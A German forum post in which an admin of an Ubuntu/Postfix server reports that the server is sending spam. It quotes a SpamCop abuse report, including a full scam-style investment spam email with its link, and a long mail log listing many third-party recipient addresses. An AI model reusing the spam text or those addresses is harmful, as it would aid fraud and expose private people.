Server sendet Spam

[luggie]

Hi
Benutze: Ubuntu 14.04 lts, postfix 2.11
Wegen vielen Spams, die meinen Mailserver erreichten, habe ich BitDefender FRAMS installiert, was eingehende Spams gut filtert. Seit der Installation ist mir aufgefallen, dass die Software weit mehr Emails scannt als sie sollte. Ein Blick in den mail.log verrät, dass mails mit meinen Domains über den Server verschickt werden. Kurz darauf meldet sich der Hoster, dass ich doch bitte das Spammen sein lassen soll. Habe Postfix jetzt ausgeschaltet.
Hier eine "Probespam":

Return-Path: <6558998579.332d7edd@bounces.spamcop.net>
Received: from localhost ([127.0.0.1] helo=mail.hetzner.company) by mail.hetzner.company with esmtp (Exim 4.80) (envelope-from <6558998579.332d7edd@bounces.spamcop.net>) id 1bujQt-0005Ni-Kw for blacklist-abuse@hetzner.de; Thu, 13 Oct 2016 19:04:39 +0200
Received: from vmail by mail.hetzner.company with local (Exim 4.80) (envelope-from <6558998579.332d7edd@bounces.spamcop.net>) id 1bujQt-0005Nc-JS for blacklist-abuse@hetzner.de; Thu, 13 Oct 2016 19:04:39 +0200
Received: from [184.94.240.112] (helo=vmx.spamcop.net) by mail.hetzner.company with esmtp (Exim 4.80) (envelope-from <6558998579.332d7edd@bounces.spamcop.net>) id 1bujQp-0005M6-7j for abuse@hetzner.de; Thu, 13 Oct 2016 19:04:39 +0200
Received: from prod-sc-www02.sv4.ironport.com (HELO prod-sc-www02.spamcop.net) ([10.8.129.226]) by prod-sc-smtp-vip.sv4.ironport.com with SMTP; Thu, 13 Oct 2016 10:02:41 -0700
Date: Thu, 13 Oct 2016 16:11:48 +0200
From: akys <6558998579@reports.spamcop.net>
To: abuse@hetzner.de
Message-ID: 1bujQt-0005Ni-Kw@mail.hetzner.company
Subject: [SpamCop
 (http://sitzungspause.de/ajax.php?d=78&JAd2AN6Pngk1GkL=5yu1&Dtf=GkR&3DHR=6x)
 id:6558998579]We offer new vacancy
Mime-Version: 1.0
Content-Type: text/plain;
 charset=UTF-8
Content-Transfer-Encoding: 7bit
Envelope-to: blacklist-abuse@hetzner.de
Delivery-date: Thu, 13 Oct 2016 19:04:39 +0200
X-Sieve: Pigeonhole Sieve 0.4.2
X-Sieve-Redirected-From: abuse-queue@hetzner.de
Precedence: list
X-SpamCop-sourceip: 136.243.54.13
X-Mailer: https://www.spamcop.net/ v4.8.5
Delivered-To: vmail-blacklist-abuse@hetzner.de

[ SpamCop V4.8.5 ]
This message is brief for your comfort.  Please use links below for details.

Email from 136.243.54.13 / Thu, 13 Oct 2016 16:11:48 +0200
https://www.spamcop.net/w3m?i=z6558998578z598b23159c6d840cca297b6681088a24z

Spamvertised web site: http://sitzungspause.de/ajax.php?d=78&JAd2AN6Pngk1GkL=5yu1&Dtf=GkR&3DHR=6x
https://www.spamcop.net/w3m?i=z6558998579z332d7edd03b56aea816c086bfac24f25z
http://sitzungspause.de/ajax.php?d=78&JAd2AN6Pngk1GkL=5yu1&Dtf=GkR&3DHR=6x is 136.243.54.13; Thu, 13 Oct 2016 17:02:38 GMT

[ Offending message ]
Received: from [80.67.29.35] (helo=mx02.ispgateway.de)
	by clara.ispgateway.de with esmtp (Exim 4.68)
	(envelope-from <benjamin_bond@sitzungspause.de>)
	id 1bugjd-0003Ui-It; Thu, 13 Oct 2016 16:11:49 +0200
Return-path: <benjamin_bond@sitzungspause.de>
X-Envelope-To: x
Received: from [136.243.54.13] (helo=hetzner.marketstrategy.de)
	by mx02.ispgateway.de with esmtps (TLSv1.2:DHE-RSA-AES256-GCM-SHA384:256)
	(Exim 4.84)
	(envelope-from <benjamin_bond@sitzungspause.de>)
	id 1bugjc-0008Pe-6Z
	for x; Thu, 13 Oct 2016 16:11:48 +0200
Received: by hetzner.marketstrategy.de (Postfix, from userid 33)
	id D278C4659DD; Thu, 13 Oct 2016 01:21:22 +0200 (CEST)
To: x
Subject: We offer new vacancy
X-PHP-Originating-Script: 33:footer.php(1949) : eval()'d code
Date: Thu, 13 Oct 2016 01:21:22 +0200
From: Benjamin Bond <benjamin_bond@sitzungspause.de>
Message-ID: <78e1________________________040f@sitzungspause.de>
X-Priority: 3
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="b1_78e1938deb0e56d06dc10debcd14040f"
Content-Transfer-Encoding: 8bit
X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on
	spamfilter03.ispgateway.de
X-Spam-Level: **********
X-Spam-Status: No, hits=10.0 required=9999.0 tests=BAYES_50,CMAE_1 autolearn=disabled
	version=3.3.1
X-Spam-CMAETAG: v=2.1 cv=SOLMVYfH c=1 sm=0 tr=0 p=T1AfiPlp5_8A:10
	p=ejwB5mvGAAAA:8 p=ViDQD3QmnzRg37tNSFIA:9 p=5CMhQTHRoVkA:10
	a=NR5p24IsT9jitHzPR8GR1Q==:17 a=1oJP67jkp3AA:10 a=CH0kA5CcgfcA:10
	a=ZZnuYtJkoWoA:10 a=nM72dFt57HW-7m5ojdUA:9 a=CjuIK1q_8ugA:10
	a=WYaTX5_29T0A:10 a=r6aDHOKj4ZoA:10 a=-FEs8UIgK8oA:10 a=NWVoK91CQyQA:10
	a=_W_S_7VecoQA:10 a=tFiXSOtoEsEA:10 a=DB5G64JNwGM0eoeKYBz7:22
	xcat=Undefined/Undefined
X-Spam-CMAECATEGORY: 0
X-Spam-CMAESUBCATEGORY: 0
X-Spam-CMAESCORE: 100

--b1_78e1938deb0e56d06dc10debcd14040f
Content-Type: text/plain; charset=us-ascii

People like you and I have been wrong way too many times...
We've lost tones of money on stupid investments....
That's why I'm glad to inform you... I found what we've been looking for!

[ http://sitzungspause.de/ajax.php?d=78&JAd2AN6Pngk1GkL=5yu1&Dtf=GkR&3DHR=6x ] 100% free and it actually works


--b1_78e1938deb0e56d06dc10debcd14040f
Content-Type: text/html; charset=us-ascii

<html>
<body>
People like you and I have been wrong way too many times...<br>
We've lost tones of money on stupid investments....<br>
That's why I'm glad to inform you... I found what we've been looking for!<br>
<br>
<a href="http://sitzungspause.de/ajax.php?d=78&JAd2AN6Pngk1GkL=5yu1&Dtf=GkR&3DHR=6x">100% free and it actually works</a><br>
</body>
</html>

--b1_78e1938deb0e56d06dc10debcd14040f--

ein Probe aus mail.log:

Oct 13 18:21:19 hetzner postfix/cleanup[4112]: A1B57474F53: message-id=<e2820fc5b5763947d1e9c69d948343a0@sitzungspause.de>
Oct 13 18:21:19 hetzner postfix/qmgr[2658]: A1B57474F53: from=<becky@sitzungspause.de>, size=1364, nrcpt=1 (queue active)
Oct 13 18:21:19 hetzner postfix/pickup[4067]: B096A4747A8: uid=33 from=<loretta@sitzungspause.de>
Oct 13 18:21:19 hetzner postfix/cleanup[4058]: B096A4747A8: message-id=<329b489a0d427b6c643bd53602be02a2@sitzungspause.de>
Oct 13 18:21:19 hetzner postfix/error[3908]: A1B57474F53: to=<gary-sharp@hotmail.com>, relay=none, delay=0.18, delays=0.09/0/0/0.09, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx3.hotmail.com[65.54.188.72] while sending RCPT TO)
Oct 13 18:21:19 hetzner postfix/qmgr[2658]: B096A4747A8: from=<loretta@sitzungspause.de>, size=1358, nrcpt=1 (queue active)
Oct 13 18:21:19 hetzner postfix/pickup[4067]: C7D50473C77: uid=33 from=<loretta@sitzungspause.de>
Oct 13 18:21:19 hetzner postfix/cleanup[4061]: C7D50473C77: message-id=<5d04fb9e83fd9d428f9b5c448ebce1ad@sitzungspause.de>
Oct 13 18:21:19 hetzner postfix/error[3734]: B096A4747A8: to=<zerou_cool@hotmail.com>, relay=none, delay=0.18, delays=0.1/0/0/0.08, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx3.hotmail.com[65.54.188.72] while sending RCPT TO)
Oct 13 18:21:19 hetzner postfix/qmgr[2658]: C7D50473C77: from=<loretta@sitzungspause.de>, size=1328, nrcpt=1 (queue active)
Oct 13 18:21:19 hetzner postfix/pickup[4067]: DAAE6474CCC: uid=33 from=<becky@sitzungspause.de>
Oct 13 18:21:19 hetzner postfix/cleanup[4112]: DAAE6474CCC: message-id=<d0a5a9d3a32e031d50b6c6cd8c259244@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/error[3913]: C7D50473C77: to=<huey3275@aol.com>, relay=none, delay=0.21, delays=0.1/0/0/0.1, dsn=4.0.0, status=deferred (delivery temporarily suspended: host mailin-02.mx.aol.com[64.12.88.163] refused to talk to me: 554- (RTR:BL)  https://postmaster.aol.com/error-codes#554rtrbl 554  Connecting IP: 136.243.54.13)
Oct 13 18:21:20 hetzner postfix/qmgr[2658]: DAAE6474CCC: from=<becky@sitzungspause.de>, size=1365, nrcpt=1 (queue active)
Oct 13 18:21:20 hetzner postfix/pickup[4067]: 0074A474F67: uid=33 from=<loretta@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/cleanup[4058]: 0074A474F67: message-id=<190dd7c9f782fa17c3d5ff12690cc113@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/smtp[2827]: 8D5634742C3: to=<roman012486@gmail.com>, relay=gmail-smtp-in.l.google.com[74.125.71.27]:25, delay=0.46, delays=0.11/0/0.16/0.19, dsn=5.7.1, status=bounced (host gmail-smtp-in.l.google.com[74.125.71.27] said: 550-5.7.1 [136.243.54.13] The IP address sending this message does not have a 550-5.7.1 PTR record setup. As a policy, Gmail does not accept messages from 550-5.7.1 IPs with missing PTR records. Please visit 550-5.7.1  https://support.google.com/mail/answer/81126#authentication for more 550 5.7.1 information. n4si18619541wjz.96 - gsmtp (in reply to end of DATA command))
Oct 13 18:21:20 hetzner postfix/error[3917]: DAAE6474CCC: to=<richalvin2@aol.com>, relay=none, delay=0.22, delays=0.13/0/0/0.09, dsn=4.0.0, status=deferred (delivery temporarily suspended: host mailin-02.mx.aol.com[64.12.88.163] refused to talk to me: 554- (RTR:BL)  https://postmaster.aol.com/error-codes#554rtrbl 554  Connecting IP: 136.243.54.13)
Oct 13 18:21:20 hetzner postfix/qmgr[2658]: 0074A474F67: from=<loretta@sitzungspause.de>, size=1393, nrcpt=1 (queue active)
Oct 13 18:21:20 hetzner postfix/pickup[4067]: 16D8C474F6B: uid=33 from=<loretta@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/cleanup[4064]: 16D8C474F6B: message-id=<679d5f4960fb7634ab2b32f552d7b4b5@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/cleanup[4058]: 17034474F7F: message-id=<20161013162120.17034474F7F@hetzner.marketstrategy.de>
Oct 13 18:21:20 hetzner postfix/error[3908]: 0074A474F67: to=<carlogrove@aol.com>, relay=none, delay=0.23, delays=0.12/0/0/0.11, dsn=4.0.0, status=deferred (delivery temporarily suspended: host mailin-02.mx.aol.com[64.12.88.163] refused to talk to me: 554- (RTR:BL)  https://postmaster.aol.com/error-codes#554rtrbl 554  Connecting IP: 136.243.54.13)
Oct 13 18:21:20 hetzner postfix/bounce[4052]: 8D5634742C3: sender non-delivery notification: 17034474F7F
Oct 13 18:21:20 hetzner postfix/qmgr[2658]: 17034474F7F: from=<>, size=4104, nrcpt=1 (queue active)
Oct 13 18:21:20 hetzner postfix/qmgr[2658]: 8D5634742C3: removed
Oct 13 18:21:20 hetzner postfix/qmgr[2658]: 16D8C474F6B: from=<loretta@sitzungspause.de>, size=1358, nrcpt=1 (queue active)
Oct 13 18:21:20 hetzner postfix/pickup[4067]: 31F18474F7B: uid=33 from=<loretta@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/cleanup[4061]: 31F18474F7B: message-id=<1c9b3fb9e66258f1fc05e943d9d4ddc4@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/smtp[2786]: 17034474F7F: to=<loretta@sitzungspause.de>, relay=none, delay=0.12, delays=0.11/0/0.01/0, dsn=5.4.6, status=bounced (mail for sitzungspause.de loops back to myself)
Oct 13 18:21:20 hetzner postfix/qmgr[2658]: 31F18474F7B: from=<loretta@sitzungspause.de>, size=1401, nrcpt=1 (queue active)
Oct 13 18:21:20 hetzner postfix/pickup[4067]: 42797474F90: uid=33 from=<loretta@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/qmgr[2658]: 17034474F7F: removed
Oct 13 18:21:20 hetzner postfix/cleanup[4112]: 42797474F90: message-id=<c10308fe95dee091736f2712f46366e1@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/error[3737]: 31F18474F7B: to=<jarriola78@hotmail.com>, relay=none, delay=0.19, delays=0.1/0/0/0.09, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx3.hotmail.com[65.54.188.72] while sending RCPT TO)
Oct 13 18:21:20 hetzner postfix/qmgr[2658]: 42797474F90: from=<loretta@sitzungspause.de>, size=1346, nrcpt=1 (queue active)
Oct 13 18:21:20 hetzner postfix/pickup[4067]: 57FAC474F7E: uid=33 from=<becky@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/cleanup[4061]: 57FAC474F7E: message-id=<3dcaa6655b38bdd3cfef9e6c55504358@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/error[3894]: 42797474F90: to=<brbakeresq@aol.com>, relay=none, delay=0.18, delays=0.09/0/0/0.08, dsn=4.0.0, status=deferred (delivery temporarily suspended: host mailin-02.mx.aol.com[64.12.88.163] refused to talk to me: 554- (RTR:BL)  https://postmaster.aol.com/error-codes#554rtrbl 554  Connecting IP: 136.243.54.13)
Oct 13 18:21:20 hetzner postfix/qmgr[2658]: 57FAC474F7E: from=<becky@sitzungspause.de>, size=1340, nrcpt=1 (queue active)
Oct 13 18:21:20 hetzner postfix/pickup[4067]: 6CDD84742C3: uid=33 from=<loretta@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/cleanup[4058]: 6CDD84742C3: message-id=<1635d43786ed0e55fc2ca63576f5d104@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/error[3897]: 57FAC474F7E: to=<naruto65635@yahoo.com>, relay=none, delay=0.17, delays=0.11/0/0/0.06, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mta5.am0.yahoodns.net[66.196.118.36] while sending RCPT TO)
Oct 13 18:21:20 hetzner postfix/qmgr[2658]: 6CDD84742C3: from=<loretta@sitzungspause.de>, size=1365, nrcpt=1 (queue active)
Oct 13 18:21:20 hetzner postfix/pickup[4067]: 7C412474F7F: uid=33 from=<becky@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/cleanup[4112]: 7C412474F7F: message-id=<9a52acf99b70ac1978b94d27e36f8584@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/qmgr[2658]: 7C412474F7F: from=<becky@sitzungspause.de>, size=1317, nrcpt=1 (queue active)
Oct 13 18:21:20 hetzner postfix/pickup[4067]: 90A1A474FA1: uid=33 from=<loretta@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/cleanup[4061]: 90A1A474FA1: message-id=<b98b67215e27a9981254b891f5459a01@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/qmgr[2658]: 90A1A474FA1: from=<loretta@sitzungspause.de>, size=1375, nrcpt=1 (queue active)
Oct 13 18:21:20 hetzner postfix/pickup[4067]: A3784474FAA: uid=33 from=<loretta@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/cleanup[4058]: A3784474FAA: message-id=<e53757fba8f8068fd98d0382c58bcf73@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/qmgr[2658]: A3784474FAA: from=<loretta@sitzungspause.de>, size=1356, nrcpt=1 (queue active)
Oct 13 18:21:20 hetzner postfix/pickup[4067]: BC386474FB9: uid=33 from=<becky@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/cleanup[4112]: BC386474FB9: message-id=<85378d3214de4baa136242c6a27d2ed5@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/smtp[2768]: connect to mx2.comcast.net[2001:558:fe21:2a::6]:25: Network is unreachable
Oct 13 18:21:20 hetzner postfix/qmgr[2658]: BC386474FB9: from=<becky@sitzungspause.de>, size=1337, nrcpt=1 (queue active)
Oct 13 18:21:20 hetzner postfix/pickup[4067]: CC5B8474FCE: uid=33 from=<becky@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/cleanup[4058]: CC5B8474FCE: message-id=<2b067252f522a6ae8ae2f0d69e66cbf5@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/qmgr[2658]: CC5B8474FCE: from=<becky@sitzungspause.de>, size=1390, nrcpt=1 (queue active)
Oct 13 18:21:20 hetzner postfix/pickup[4067]: E2D8F474FE6: uid=33 from=<loretta@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/cleanup[4112]: E2D8F474FE6: message-id=<682a0ff1fae620bc32b430f32063c8ee@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/qmgr[2658]: E2D8F474FE6: from=<loretta@sitzungspause.de>, size=1397, nrcpt=1 (queue active)
Oct 13 18:21:20 hetzner postfix/pickup[4067]: F1CF9474FF1: uid=33 from=<becky@sitzungspause.de>
Oct 13 18:21:20 hetzner postfix/cleanup[4064]: F1CF9474FF1: message-id=<339053b3730de8fcb4917b174cfa1224@sitzungspause.de>
Oct 13 18:21:21 hetzner postfix/error[3878]: E2D8F474FE6: to=<allybally911@hotmail.com>, relay=none, delay=0.18, delays=0.09/0/0/0.1, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx3.hotmail.com[65.54.188.72] while sending RCPT TO)
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: F1CF9474FF1: from=<becky@sitzungspause.de>, size=1369, nrcpt=1 (queue active)
Oct 13 18:21:21 hetzner postfix/pickup[4067]: 156C2474FF4: uid=33 from=<loretta@sitzungspause.de>
Oct 13 18:21:21 hetzner postfix/cleanup[4058]: 156C2474FF4: message-id=<f953e8ef79a26fd783f357d75495605e@sitzungspause.de>
Oct 13 18:21:21 hetzner postfix/smtp[3939]: D3D8A473B9F: to=<ohiohornhunter@me.com>, relay=mx5.mail.icloud.com[17.133.229.11]:25, delay=2.4, delays=0.13/0/1.2/1.1, dsn=2.5.0, status=sent (250 2.5.0 Ok.)
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: D3D8A473B9F: removed
Oct 13 18:21:21 hetzner postfix/error[3883]: F1CF9474FF1: to=<bosshog7964@yahoo.com>, relay=none, delay=0.27, delays=0.11/0/0/0.16, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mta5.am0.yahoodns.net[66.196.118.36] while sending RCPT TO)
Oct 13 18:21:21 hetzner postfix/smtp[2784]: BC386474FB9: to=<kipwkroeger@verizon.net>, relay=relay.verizon.net[206.46.232.11]:25, delay=0.34, delays=0.07/0/0.27/0, dsn=4.0.0, status=deferred (host relay.verizon.net[206.46.232.11] refused to talk to me: 571 Email from 136.243.54.13 is currently blocked by Verizon Online's anti-spam system. The email sender or Email Service Provider may visit http://www.verizon.net/whitelist and request removal of the block. 161013)
Oct 13 18:21:21 hetzner postfix/smtp[2741]: 787554742A0: to=<robinallison@optonline.net>, relay=mx.optimum.net[167.206.4.79]:25, delay=1.6, delays=0.11/0/1.1/0.41, dsn=5.7.1, status=bounced (host mx.optimum.net[167.206.4.79] said: 554 5.7.1 Spam detected by content scanner.  Message rejected.  (in reply to end of DATA command))
Oct 13 18:21:21 hetzner postfix/smtp[2742]: 6CDD84742C3: to=<johnny.ringo2121@gmail.com>, relay=gmail-smtp-in.l.google.com[74.125.71.27]:25, delay=0.68, delays=0.09/0/0.17/0.42, dsn=5.7.1, status=bounced (host gmail-smtp-in.l.google.com[74.125.71.27] said: 550-5.7.1 [136.243.54.13] The IP address sending this message does not have a 550-5.7.1 PTR record setup. As a policy, Gmail does not accept messages from 550-5.7.1 IPs with missing PTR records. Please visit 550-5.7.1  https://support.google.com/mail/answer/81126#authentication for more 550 5.7.1 information. je6si1541506wjb.41 - gsmtp (in reply to end of DATA command))
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: 156C2474FF4: from=<loretta@sitzungspause.de>, size=1382, nrcpt=1 (queue active)
Oct 13 18:21:21 hetzner postfix/pickup[4067]: 3D9BF473B9F: uid=33 from=<becky@sitzungspause.de>
Oct 13 18:21:21 hetzner postfix/cleanup[4112]: 3D9BF473B9F: message-id=<cc984f7be463c71cd621d33903743ef9@sitzungspause.de>
Oct 13 18:21:21 hetzner postfix/cleanup[4064]: 3DF18474FF6: message-id=<20161013162121.3DF18474FF6@hetzner.marketstrategy.de>
Oct 13 18:21:21 hetzner postfix/cleanup[4061]: 3DF7E475080: message-id=<20161013162121.3DF7E475080@hetzner.marketstrategy.de>
Oct 13 18:21:21 hetzner postfix/smtpd[3628]: connect from webmail.esa.at[185.16.113.2]
Oct 13 18:21:21 hetzner postfix/error[3880]: 156C2474FF4: to=<crosserjackie@yahoo.com>, relay=none, delay=0.27, delays=0.19/0/0/0.07, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mta5.am0.yahoodns.net[66.196.118.36] while sending RCPT TO)
Oct 13 18:21:21 hetzner postfix/bounce[4048]: 6CDD84742C3: sender non-delivery notification: 3DF18474FF6
Oct 13 18:21:21 hetzner postfix/bounce[4052]: 787554742A0: sender non-delivery notification: 3DF7E475080
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: 3D9BF473B9F: from=<becky@sitzungspause.de>, size=1333, nrcpt=1 (queue active)
Oct 13 18:21:21 hetzner postfix/pickup[4067]: 5043E475051: uid=33 from=<becky@sitzungspause.de>
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: 6CDD84742C3: removed
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: 787554742A0: removed
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: 3DF7E475080: from=<>, size=3431, nrcpt=1 (queue active)
Oct 13 18:21:21 hetzner postfix/cleanup[4058]: 5043E475051: message-id=<578305bb9376b96a497402f8cf048959@sitzungspause.de>
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: 3DF18474FF6: from=<>, size=4095, nrcpt=1 (queue active)
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: 5043E475051: from=<becky@sitzungspause.de>, size=1396, nrcpt=1 (queue active)
Oct 13 18:21:21 hetzner postfix/smtp[2754]: 7C412474F7F: to=<flickerst@charter.net>, relay=mx1.charter.net[68.114.188.69]:25, delay=0.83, delays=0.09/0/0.32/0.42, dsn=2.0.0, status=sent (250 2.0.0 v4ML1t02v0H6Qkw014MLSN mail accepted for delivery E0000)
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: 7C412474F7F: removed
Oct 13 18:21:21 hetzner postfix/smtp[2783]: connect to gmail-smtp-in.l.google.com[2a00:1450:400c:c02::1a]:25: Network is unreachable
Oct 13 18:21:21 hetzner postfix/smtpd[3651]: connect from mx.ab.pl[195.116.103.72]
Oct 13 18:21:21 hetzner postfix/smtp[2828]: 3DF7E475080: to=<becky@sitzungspause.de>, relay=none, delay=0.08, delays=0.08/0/0/0, dsn=5.4.6, status=bounced (mail for sitzungspause.de loops back to myself)
Oct 13 18:21:21 hetzner postfix/smtp[2740]: 3DF18474FF6: to=<loretta@sitzungspause.de>, relay=none, delay=0.08, delays=0.08/0/0/0, dsn=5.4.6, status=bounced (mail for sitzungspause.de loops back to myself)
Oct 13 18:21:21 hetzner postfix/error[3879]: 5043E475051: to=<jldevane1@hotmail.com>, relay=none, delay=0.1, delays=0.01/0/0/0.09, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx3.hotmail.com[65.54.188.72] while sending RCPT TO)
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: 3DF7E475080: removed
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: 3DF18474FF6: removed
Oct 13 18:21:21 hetzner postfix/pickup[4067]: 66D844742A0: uid=33 from=<becky@sitzungspause.de>
Oct 13 18:21:21 hetzner postfix/cleanup[4061]: 66D844742A0: message-id=<a411dca2cc8b9eb4329557594ef1ce27@sitzungspause.de>
Oct 13 18:21:21 hetzner postfix/smtpd[3628]: NOQUEUE: reject: RCPT from webmail.esa.at[185.16.113.2]: 454 4.7.1 <jayden_bowers@sitzungspause.de>: Relay access denied; from=<> to=<jayden_bowers@sitzungspause.de> proto=ESMTP helo=<webmail.esa.at>
Oct 13 18:21:21 hetzner postfix/smtpd[3628]: disconnect from webmail.esa.at[185.16.113.2]
Oct 13 18:21:21 hetzner postfix/smtpd[3651]: NOQUEUE: reject: RCPT from mx.ab.pl[195.116.103.72]: 454 4.7.1 <monika_szymanski@sitzungspause.de>: Relay access denied; from=<> to=<monika_szymanski@sitzungspause.de> proto=ESMTP helo=<mx.ab.pl>
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: 66D844742A0: from=<becky@sitzungspause.de>, size=1315, nrcpt=1 (queue active)
Oct 13 18:21:21 hetzner postfix/smtp[2974]: connect to mx2.comcast.net[2001:558:fe21:2a::6]:25: Network is unreachable
Oct 13 18:21:21 hetzner postfix/smtpd[2905]: connect from localhost.localdomain[127.0.0.1]
Oct 13 18:21:21 hetzner postfix/smtpd[2905]: 846B64742C3: client=localhost.localdomain[127.0.0.1]
Oct 13 18:21:21 hetzner postfix/smtpd[3651]: disconnect from mx.ab.pl[195.116.103.72]
Oct 13 18:21:21 hetzner postfix/cleanup[4064]: 846B64742C3: message-id=<20161013162121.846B64742C3@hetzner.marketstrategy.de>
Oct 13 18:21:21 hetzner opendkim[2519]: 846B64742C3: no signing table match for 'bitdefender@hetzner.marketstrategy.de'
Oct 13 18:21:21 hetzner opendkim[2519]: 846B64742C3: no signature data
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: 846B64742C3: from=<bitdefender@hetzner.marketstrategy.de>, size=731, nrcpt=1 (queue active)
Oct 13 18:21:21 hetzner postfix/smtpd[2905]: disconnect from localhost.localdomain[127.0.0.1]
Oct 13 18:21:21 hetzner postfix/smtpd[2778]: connect from localhost.localdomain[127.0.0.1]
Oct 13 18:21:21 hetzner postfix/smtpd[3139]: connect from localhost.localdomain[127.0.0.1]
Oct 13 18:21:21 hetzner postfix/smtpd[2778]: 991EB474F7F: client=localhost.localdomain[127.0.0.1]
Oct 13 18:21:21 hetzner postfix/smtpd[3139]: A2B9D474FF6: client=localhost.localdomain[127.0.0.1]
Oct 13 18:21:21 hetzner postfix/cleanup[4112]: 991EB474F7F: message-id=<20161013162121.991EB474F7F@hetzner.marketstrategy.de>
Oct 13 18:21:21 hetzner opendkim[2519]: 991EB474F7F: no signing table match for 'bitdefender@hetzner.marketstrategy.de'
Oct 13 18:21:21 hetzner opendkim[2519]: 991EB474F7F: no signature data
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: 991EB474F7F: from=<bitdefender@hetzner.marketstrategy.de>, size=731, nrcpt=1 (queue active)
Oct 13 18:21:21 hetzner postfix/smtpd[2778]: disconnect from localhost.localdomain[127.0.0.1]
Oct 13 18:21:21 hetzner postfix/smtpd[3122]: connect from localhost.localdomain[127.0.0.1]
Oct 13 18:21:21 hetzner postfix/smtpd[3122]: B71AB47505E: client=localhost.localdomain[127.0.0.1]
Oct 13 18:21:21 hetzner postfix/cleanup[4061]: A2B9D474FF6: message-id=<20161013162121.846B64742C3@hetzner.marketstrategy.de>
Oct 13 18:21:21 hetzner opendkim[2519]: A2B9D474FF6: no signing table match for 'bitdefender@hetzner.marketstrategy.de'
Oct 13 18:21:21 hetzner opendkim[2519]: A2B9D474FF6: no signature data
Oct 13 18:21:21 hetzner postfix/smtp[2784]: 846B64742C3: to=<postmaster@hetzner.marketstrategy.de>, relay=127.0.0.1[127.0.0.1]:10025, delay=0.29, delays=0.08/0/0.04/0.17, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as A2B9D474FF6)
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: A2B9D474FF6: from=<bitdefender@hetzner.marketstrategy.de>, size=1635, nrcpt=1 (queue active)
Oct 13 18:21:21 hetzner postfix/smtpd[3139]: disconnect from localhost.localdomain[127.0.0.1]
Oct 13 18:21:21 hetzner postfix/qmgr[2658]: 846B64742C3: removed
Oct 13 18:21:21 hetzner postfix/smtp[2783]: 3D9BF473B9F: to=<thomaskedwards@gmail.com>, relay=gmail-smtp-in.l.google.com[74.125.71.27]:25, delay=0.64, delays=0.18/0/0.16/0.3, dsn=5.7.1, status=bounced (host gmail-smtp-in.l.google.com[74.125.71.27] said: 550-5.7.1 [136.243.54.13] The IP address sending this message does not have a 550-5.7.1 PTR record setup. As a policy, Gmail does not accept messages from 550-5.7.1 IPs with missing PTR records. Please visit 550-5.7.1  https://support.google.com/mail/answer/81126#authentication for more 550 5.7.1 information. cj2si18572616wjc.184 - gsmtp (in reply to end of DATA command))
Oct 13 18:21:21 hetzner postfix/cleanup[4058]: D4A34475080: message-id=<20161013162121.D4A34475080@hetzner.marketstrategy.de>
Oct 13 18:21:21 hetzner postfix/smtp[2752]: 3DF0947427A: to=<rgetche@comcast.net>, relay=mx1.comcast.net[96.114.157.80]:25, delay=2.7, delays=0.11/0/1.6/0.97, dsn=2.0.0, status=sent (250 2.0.0 v4MK1t04n0H6Qkw014MM3R mail accepted for delivery)
Oct 13 18:21:21 hetzner postfix/smtp[3939]: A2B9D474FF6: to=<postmaster@hetzner.marketstrategy.de>, relay=none, delay=0.17, delays=0.17/0/0/0, dsn=5.4.4, status=bounced (Host or domain name not found. Name service error for name=hetzner.marketstrategy.de type=AAAA: Host not found)
Oct 13 18:21:21 hetzner postfix/cleanup[4112]: DD5334750B3: message-id=<20161013162121.DD5334750B3@hetzner.marketstrategy.de>
Oct 13 18:21:21 hetzner postfix/cleanup[4064]: B71AB47505E: message-id=<20161013162121.991EB474F7F@hetzner.marketstrategy.de>
Oct 13 18:21:21 hetzner opendkim[2519]: B71AB47505E: no signing table match for 'bitdefender@hetzner.marketstrategy.de'
